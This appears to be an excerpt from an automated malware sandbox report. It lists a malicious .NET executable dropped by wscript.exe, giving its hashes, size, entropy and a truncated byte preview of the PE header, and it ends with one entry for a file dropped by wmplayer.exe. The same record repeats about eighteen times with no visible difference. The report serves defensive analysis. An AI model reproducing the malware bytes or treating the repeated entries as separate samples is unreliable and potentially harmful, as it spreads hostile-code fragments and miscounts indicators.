                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:Matlab v4 mat-file (little endian) \253\373\277\272\002, sparse, rows 2, columns 0, imaginary
                          Category:dropped
                          Size (bytes):1868
                          Entropy (8bit):3.326526240064238
                          Encrypted:false
